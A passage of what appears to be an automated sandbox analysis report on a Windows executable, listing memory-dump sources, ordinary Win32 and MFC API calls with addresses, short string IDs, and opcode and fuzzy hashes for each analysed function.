                                      • Opcode Fuzzy Hash: 60c10ff6a55392d29506e87486369c4c1ba64106531382c9855b071ae32116ff
                                      • Instruction Fuzzy Hash: 36F012719407445BE730BF729D09B47BAE0FFC4B10F02092ED1458BAA0E6B5E401DF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Version$ClipboardFormatRegister
                                      • String ID: MSWHEEL_ROLLMSG
                                      • API String ID: 2888461884-2485103130
                                      • Opcode ID: 64227a437cb31b995d12e57f0edaeb39f24ba93316eaf763517f2ecd1fea96e5
                                      • Instruction ID: beb7c48d639abde93f77ce5c0036600a359ec95fa13832f012975d2c4985a98c
                                      • Opcode Fuzzy Hash: 64227a437cb31b995d12e57f0edaeb39f24ba93316eaf763517f2ecd1fea96e5
                                      • Instruction Fuzzy Hash: 47E0483E80412666F7119768FC003E62554D7D9791F7541379F01822616B7CC8478BEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b3d72163a493a4d22e8ec3e49a5a339da07c6d5cf06789a74a8f99014e62561
                                      • Instruction ID: b66e4d598c86ad4f71ce10ea27c0b773a6d4f2007d18b37b04457ac92ab27136
                                      • Opcode Fuzzy Hash: 8b3d72163a493a4d22e8ec3e49a5a339da07c6d5cf06789a74a8f99014e62561
                                      • Instruction Fuzzy Hash: 24B12371E00218DBCB14DFA9C991BDEBBB5BF88304F1081AAE50AB7291DB346A45CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MapDialogRect.USER32(?,?), ref: 0042DE3E
                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0042DE5F
                                      • CLSIDFromString.OLE32(0000FFFC,?), ref: 0042DF4A
                                      • CLSIDFromProgID.OLE32(0000FFFC,?), ref: 0042DF52
                                      • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 0042DFEE
                                      • SysFreeString.OLEAUT32(?), ref: 0042E041
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: String$From$AllocDialogFreeProgRectWindow
                                      • String ID:
                                      • API String ID: 704962466-0
                                      • Opcode ID: 2c7c8883dafd529351ad48ac23e63801bdc4fe3f9fbfe131b7d46839deb3fe36
                                      • Instruction ID: 0c8e765037df8b0da75177545a34100ce6306607b724cd0097298645f45fa914
                                      • Opcode Fuzzy Hash: 2c7c8883dafd529351ad48ac23e63801bdc4fe3f9fbfe131b7d46839deb3fe36
                                      • Instruction Fuzzy Hash: BCA15B71E0021ADFDB00DFA5D984AEEB7B4FF08304F51412EE819A7351E7749A55CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 00432BD9
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C5A
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C69
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C78
                                      • VariantClear.OLEAUT32(?), ref: 00432C82
                                      • VariantClear.OLEAUT32(?), ref: 00432C93
                                        • Part of subcall function 00432358: VariantClear.OLEAUT32(00000007), ref: 004328B1
                                        • Part of subcall function 00432358: VariantClear.OLEAUT32(?), ref: 00432ABE
                                        • Part of subcall function 00434A8C: VariantCopy.OLEAUT32(?,?), ref: 00434A94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Variant$Clear$FreeString$Copy
                                      • String ID:
                                      • API String ID: 3064640362-0
                                      • Opcode ID: 954d956b31b477e2ea17b671002bcd482803955b2a4e3fbc99098daf02d95ec2
                                      • Instruction ID: 7bb94790ebd446becceac3de6fc571204b9a9d1114fd1ce21a397d89f96dd6f3
                                      • Opcode Fuzzy Hash: 954d956b31b477e2ea17b671002bcd482803955b2a4e3fbc99098daf02d95ec2
                                      • Instruction Fuzzy Hash: FF516B71900209EFDB14DFA4C984BEEBBB8FF08304F14412AE116E7291D7B4A945CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetStringTypeW.KERNEL32(00000001,004614D0,00000001,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8AC
                                      • GetStringTypeA.KERNEL32(00000000,00000001,004614CC,00000001,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8C6
                                      • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8FA
                                      • MultiByteToWideChar.KERNEL32(0043796C,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C932
                                      • MultiByteToWideChar.KERNEL32(0043796C,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0043796C,00000001,00000020,00000100,?), ref: 0043C988
                                      • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0043796C,00000001,00000020,00000100,?), ref: 0043C99A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 3852931651-0
                                      • Opcode ID: 347e30dcb63d85e336433e665b79fdfd7dd9f8b5976e34a805e73d81635b2fac
                                      • Instruction ID: a8677c1b11a4e28ded07bce43afbed48718b2ab034e527602bf3a94c4d17b718
                                      • Opcode Fuzzy Hash: 347e30dcb63d85e336433e665b79fdfd7dd9f8b5976e34a805e73d81635b2fac
                                      • Instruction Fuzzy Hash: 32418EB1900619AFCF209F95CC85BEF3BB9EF0D751F144426FA15E6260D3389950CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __ftol.LIBCMT ref: 0040141A
                                      • __ftol.LIBCMT ref: 00401446
                                      • _Smanip.LIBCPMTD ref: 00401464
                                      • _Smanip.LIBCPMTD ref: 0040147A
                                        • Part of subcall function 0044AC36: CreateSolidBrush.GDI32(?), ref: 0044AC58
                                        • Part of subcall function 0044ABE6: CreatePen.GDI32(?,00401104,00000000), ref: 0044AC0E
                                        • Part of subcall function 0044A53D: SelectObject.GDI32(?,00000000), ref: 0044A55F
                                        • Part of subcall function 0044A53D: SelectObject.GDI32(?,555AE900), ref: 0044A575
                                        • Part of subcall function 00401EC0: Pie.GDI32(00000000,0044F7AD,555AE900,4D8DFFFE,2281E8E0,?,?,00FF4242,00FF4242), ref: 00401EF9
                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 00401566
                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 00401578
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CreateObjectSelectSmanip__ftolstd::bad_exception::~bad_exception$BrushSolid
                                      • String ID:
                                      • API String ID: 2865121653-0
                                      • Opcode ID: 668bb19c5485c8068c38e5566e1ccb51fbafa02bcf6630d7518076b64fcc33bf
                                      • Instruction ID: 04aacc64678d1c760d9e52228f79605db39123fb26d4e80a03fd2d4bd5697152
                                      • Opcode Fuzzy Hash: 668bb19c5485c8068c38e5566e1ccb51fbafa02bcf6630d7518076b64fcc33bf
                                      • Instruction Fuzzy Hash: 52511271E00218DBDB14DFA9C991BEEB7B5BF88300F108099E10AAB295DB306E85CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TlsGetValue.KERNEL32(00471280,00471264,00000000,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CE98
                                      • EnterCriticalSection.KERNEL32(0047129C,00000010,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CEE7
                                      • LeaveCriticalSection.KERNEL32(0047129C,00000000,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CEFA
                                      • LocalAlloc.KERNEL32(00000000,00000004,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CF10
                                      • LocalReAlloc.KERNEL32(?,00000004,00000002,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CF22
                                      • TlsSetValue.KERNEL32(00471280,00000000), ref: 0044CF5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                      • String ID:
                                      • API String ID: 4117633390-0
                                      • Opcode ID: 0de25c5ec96a3f8a85c39abde67682adc229e1a3fbc1a050a6df798080ba9777
                                      • Instruction ID: 82db8c0ac84b42f7c456ce424ce25d417691b87606232cfbe5b4884b67e0bb50
                                      • Opcode Fuzzy Hash: 0de25c5ec96a3f8a85c39abde67682adc229e1a3fbc1a050a6df798080ba9777
                                      • Instruction Fuzzy Hash: 2231CC31200705AFE764DF15C889F66B7F9FB44325F04852AF41AC7690EB78E809CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004430B8
                                      • GetWindowTextLengthA.USER32(?), ref: 004430C2
                                      • GetWindowTextA.USER32 ref: 004430EA
                                      • SetTextColor.GDI32(?,00000000), ref: 0044312B
                                      • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 00443143
                                      • SetTextColor.GDI32(?,?), ref: 00443155
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Text$ColorWindow$DrawLength
                                      • String ID:
                                      • API String ID: 1177705772-0
                                      • Opcode ID: e4f8b6037da8cb52fa2bf58fd9f8e8c3ace4a59f33b01e22b3fb1f9827787093
                                      • Instruction ID: 8ba6ee22ba21225c7dd55d4ed945e0a358bd402d7179dd40fa04216376d6d9d4
                                      • Opcode Fuzzy Hash: e4f8b6037da8cb52fa2bf58fd9f8e8c3ace4a59f33b01e22b3fb1f9827787093
                                      • Instruction Fuzzy Hash: EF214F76600208AFD714CF98DD84EBB77B9EB88712F14825AFD5997391CA34EE01CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                      • String ID:
                                      • API String ID: 670545878-0
                                      • Opcode ID: 96968ea498528434dd6b43288ea13ab76f69d249a94d423d0dbaa6cc29fea2fd
                                      • Instruction ID: 246a7e99941b8f2adf9d4c330942d1de78a86abc8e34f05b9367c227154809fe
                                      • Opcode Fuzzy Hash: 96968ea498528434dd6b43288ea13ab76f69d249a94d423d0dbaa6cc29fea2fd
                                      • Instruction Fuzzy Hash: 91118232601322A7F7315A6A5C44B2BF698DF55B6AF060226ED01D3311DB78CC0286EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                      • String ID:
                                      • API String ID: 1315500227-0
                                      • Opcode ID: 34d06bd2a9273b6cb25b0f563afc0dc5beae5e0d68970119f53a210f8cf582f5
                                      • Instruction ID: d2551258cf798b7f5fd1eae1dfab7e6a68db31cd699830dc9efdf4154112a5c2
                                      • Opcode Fuzzy Hash: 34d06bd2a9273b6cb25b0f563afc0dc5beae5e0d68970119f53a210f8cf582f5
                                      • Instruction Fuzzy Hash: 2C01F27154061AABEB119B64DC08FEF376DEF05302F004132FC21D2170E734C9228BAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                        • Part of subcall function 00438FDC: LeaveCriticalSection.KERNEL32(?,004354B5,00000009,?,00000009,00000000,?,00435475,000000E0,00435462,?,00438F9B,00000018,00000000,?), ref: 00438FE9
                                      • GetTimeZoneInformation.KERNEL32(0000000C,00429BC6,0000000C,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80,00429BC6), ref: 0043A3C0
                                      • WideCharToMultiByte.KERNEL32(00000220,004716E4,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043A456
                                      • WideCharToMultiByte.KERNEL32(00000220,00471738,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043A48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                      • String ID: ,F$lF
                                      • API String ID: 3442286286-2452125446
                                      • Opcode ID: c933c93611ede7622a02233d4a43030aeb7bf075aa445f6c156a095f196eea8c
                                      • Instruction ID: fdd857715ab5b250e0da41b044d6261ea789cf330b4b7fc18113a1ce1a597965
                                      • Instruction Fuzzy Hash: 65610471644240AFD7259F6AAC85B663BE4FB0D314F18213FE0C5962E2E3B84991CB0F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00445107
                                      • GetWindowLongA.USER32 ref: 00445118
                                      • GetWindowLongA.USER32 ref: 00445128
                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00445144
                                      Strings
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID: (
                                      • API String ID: 2178440468-3887548279
                                      • Opcode ID: cfc1a28afa20f082c2dab0b4560dc7b1d48e41fc40cd5691601be503aa5a392c
                                      • Instruction ID: 53d0594416a0d312bce11af37c68001c305e2154efac2c1b0500241cfaa40d35
                                      • Instruction Fuzzy Hash: BC31AF34600B049FEF20AF75C884B6EB7F5BF44714F15462EE54297692DB79E8048B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044D75E
                                        • Part of subcall function 0044D84A: lstrlenA.KERNEL32(00000104,00000000,?,0044D78E), ref: 0044D881
                                      • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044D7FF
                                      • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044D82C
                                      Strings
                                      Similarity
                                      • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                      • String ID: .HLP$.INI
                                      • API String ID: 2421895198-3011182340
                                      • Opcode ID: 17e6fd48cdd33c5522bfe59f8e728cd046661e784031b116e9360ec72bce90df
                                      • Instruction ID: 49aa9f67b4690fae07ff6e31ea6bb8c6a147cc0cb8ac858bc3ff5172cafc0832
                                      • Instruction Fuzzy Hash: 6E3188B5804718AFEB20DF71D885BC6B7FCAB18304F10496BE195D3151EB74AA84CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,]C,?,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC88
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,FFFFFFFF,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC9B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,FFFFFFFF,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCE7
                                      • CompareStringW.KERNEL32(?,?,00429A3B,FFFFFFFF,?,00000000,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCFF
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide$CompareString
                                      • String ID: ]C
                                      • API String ID: 376665442-391739762
                                      • Opcode ID: 4f14520250a3c2f43a10a31574576f863b55bdf851653e98674810b73a6f6ace
                                      • Instruction ID: f1b6caffcbb91795f99dca17527fbd94d0cf750d774a684f50343bbd6e806959
                                      • Instruction Fuzzy Hash: 29212932D0024AEBCF218F94DC45ADEBFB5FF4C350F11416AFA1166260C3369925DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 00447DFD
                                      • GetDlgItem.USER32 ref: 00447E1C
                                      • IsWindowEnabled.USER32(00000000), ref: 00447E27
                                      • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00447E3D
                                      Strings
                                      Similarity
                                      • API ID: Window$EnabledItemLongMessageSend
                                      • String ID: Edit
                                      • API String ID: 3499652902-554135844
                                      • Opcode ID: 47ac76d3a4286c0aeb73ae52c6f7085f5d7f31cb17f0d072d8e8463c81c36476
                                      • Instruction ID: ec2d402bd92ff8bd2b9571b42e1720bf66644e5120e22b6cca267d7522bfd557
                                      • Instruction Fuzzy Hash: 0501C4312887016BFF211A258C0AB6B6355AF11B55F205A6BF501E12E1CBA8DC53C55D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00440B53
                                      • GetWindow.USER32(00000000,00000005), ref: 00440B6F
                                      • GetWindow.USER32(00000000,00000002), ref: 00440B85
                                      • GetWindow.USER32(00000000,00000002), ref: 00440B90
                                      Strings
                                      Similarity
                                      • API ID: Window
                                      • String ID: @-G
                                      • API String ID: 2353593579-1196022286
                                      • Opcode ID: da314168261c7fb4baca767237a719160f724def35fda72bebc97a6ffcac1145
                                      • Instruction ID: d8a140ab4dce615356c2245ed0e664d15ed43b9b654449af4086953ebe77c088
                                      • Instruction Fuzzy Hash: 2EF0F42734074522E23161AA6C86F6BB798CBE1B25F10003BF704A6282ED69E824423D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00440C55
                                      • GetWindowLongA.USER32 ref: 00440C62
                                      • SetTextColor.GDI32(?,00000000), ref: 00440C7F
                                      • SetBkColor.GDI32(?,00000000), ref: 00440C8D
                                      Strings
                                      Similarity
                                      • API ID: ColorWindow$LongText
                                      • String ID: @-G
                                      • API String ID: 3945788684-1196022286
                                      • Opcode ID: a47fe7cc8f97ddd447ca87251803984e5713b9efd555973ec74b7ead7b019b92
                                      • Instruction ID: fa080b043639f9ff9c80182d3a7f6b499dc77eea3cf8a8ec5aadc1ef73b1efb1
                                      • Instruction Fuzzy Hash: EF01DD36119250DBEB34D774AD88ADF7754EB91322F004A27F641C31A4C3389991C26D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetStartupInfoA.KERNEL32(?), ref: 0043B6C1
                                      • GetFileType.KERNEL32(?,?,00000000), ref: 0043B76C
                                      • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0043B7CF
                                      • GetFileType.KERNEL32(00000000,?,00000000), ref: 0043B7DD
                                      • SetHandleCount.KERNEL32 ref: 0043B814
                                      Similarity
                                      • API ID: FileHandleType$CountInfoStartup
                                      • String ID:
                                      • API String ID: 1710529072-0
                                      • Opcode ID: 0eade221e94c48650ff76caf6fcf19b6ec12200e2334e782ae47dfbccec2ebc5
                                      • Instruction ID: 46481e97061966e4428f6709ebec281b0e012d85a4d1cbe2264cd633cde2eb37
                                      • Instruction Fuzzy Hash: 925127719046018FC720CF38C8887667BE0EB89368F29567FD6A68B3E1D738D945C799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004455FE
                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00445620
                                      • GetCapture.USER32 ref: 00445632
                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00445641
                                      • WinHelpA.USER32 ref: 00445655
                                      Similarity
                                      • API ID: MessageSend$CaptureHelp
                                      • String ID:
                                      • API String ID: 1616918565-0
                                      • Opcode ID: 24f8b75905912948e1aab5aa90071a0e64e00ad2f495bf43c9700723e05917e6
                                      • Instruction ID: bf8f2667cc318fd8a562c4fb9357d2f08ddf87b87023d6ba38354b39d512c595
                                      • Instruction Fuzzy Hash: A4219271200608BFFB206F65CC86F7ABBA9EF04758F158539B211975E3CB759C009B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6aed253b80fae7566f2fd8e51e0ef7920f7c43528cf22fef89e135d213c1d9fb
                                      • Instruction ID: 0bb7f15bec8333e2fe4e6f2ca84b3c713c97abf9fd1d941e05386a267798ac60
                                      • Instruction Fuzzy Hash: 8D3148316142209FE3749B18EA49A6237B0FB94356F11813BE68EC72A2C7F49C95CF19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetMapMode.GDI32(?,?,?,?,?,?,0042F459,?,00000000,?,?,?,?,?,?,?), ref: 0044BD01
                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0044BD3B
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0044BD44
                                        • Part of subcall function 0044A868: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0044A879
